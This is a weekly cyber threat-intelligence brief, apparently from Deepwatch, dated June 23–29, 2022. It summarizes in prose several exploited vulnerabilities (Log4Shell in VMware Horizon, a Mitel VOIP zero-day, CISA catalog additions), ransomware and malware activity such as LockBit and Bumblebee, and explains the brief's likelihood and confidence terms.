Cyber Intel Brief: June 23 – 29, 2022

Exploited Vulnerabilities

Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems

What You Need To Know:

CISA and the United States Coast Guard Cyber Command (CGCYBER) released a joint Cybersecurity Advisory (CSA) to warn organizations “that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.”


Exploited Vulnerabilities

CrowdStrike Identifies Novel Exploit in VOIP Appliance

What You Need To Know:

During an incident response engagement, Crowdstrike discovered a threat actor exploiting a zero-day vulnerability in a Mitel VOIP appliance. The vulnerability is now tracked as CVE-2022-29499 and affects Mitel VOIP appliances SA 100, SA 400, and Virtual SA. According to Crowdstrike’s analysis, all malicious activity originated from the internal IP address associated with the Mitel VOIP appliance. Additionally, to exploit the appliance, the threat actor sent two GET requests. “The first request targeted a get_url parameter of a php file, populating the parameter with a URL to a local file on the device. This caused the second request to originate from the device itself, which led to exploitation” resulting in a reverse shell.


Exploited Vulnerabilities

CISA Adds Eight Vulnerabilities to its Known Exploited Catalog

What You Need To Know:

Based on evidence of active exploitation, CISA has added the eight vulnerabilities listed on the next page to its Known Exploited Vulnerabilities Catalog. Some of the software affected include multiple Apple products and an out-of-bounds read and write Vulnerability in Red Hat’s Polkit. Threat actors frequently use these vulnerabilities as an attack vector, posing a serious threat to organizations. Additionally, the Threat Intel Team at Deepwatch will continue to monitor new vulnerabilities added to the Catalog and keep customers informed via the weekly Cyber Intel Brief.


Ransomware

Common TTPs of Modern Ransomware Groups

What You Need To Know:

Researchers from Kaspersky describe the many stages of a ransomware deployment, how hackers employ RATs and other tools throughout each stage, and their goals in a recent 137 page report. The study also introduces the reader to the SIGMA detection criteria they developed and offers a visual approach to protecting against targeted ransomware attacks using examples from the most well-known groups.


Ransomware

LockBit Ransomware Disguised as Copyright-Claim Emails

What You Need To Know:

LockBit ransomware has been observed being distributed by phishing emails posing as copyright claims, according to the South Korean cybersecurity firm ASEC. The phishing emails contained a ZIP file that, when decompressed, includes the proprietary compressed file format “.alz.” The LockBit ransomware executable is hidden within this compressed file using a PDF icon.


Malware

Bumblebee: New Loader Rapidly Assuming Central Position in Cyber-Crime Ecosystem

What You Need To Know:

Symantec recently analyzed tools used in attacks involving Bumblebee, a new malware loader, and their analysis has linked it to a number of ransomware operations including Conti, Quantum, and Mountlocker. The tactics, techniques, and procedures (TTPs) used in these attacks support Symantec’s hypothesis that Bumblebee may be a replacement for Trickbot and BazarLoader, based off of overlapping activity between Bumblebee and older attacks that have been linked to these loaders. 


What We Mean When We Say

Estimates of Likelihood

We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms unlikely and remote imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like might and might reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.

Confidence in Assessments

Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:

  • High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
  • Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
  • Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.

Share

LinkedIn Twitter YouTube

Subscribe to the Deepwatch Insights Blog